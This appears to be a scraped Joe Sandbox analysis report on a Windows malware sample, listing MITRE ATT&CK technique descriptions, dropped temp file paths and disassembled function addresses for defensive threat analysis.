Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rACq8Eaix6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\73272964

C:\Users\user\AppData\Local\Temp\aut2761.tmp

C:\Users\user\AppData\Local\Temp\underbalanced

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
rACq8Eaix6.exe

Function 00BD3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00BD49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00BD4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00C39155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00BD3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Function 00BD3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00BD708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00BD3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00BD3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00BD3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 0181BA00 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00BD39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0181B7C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre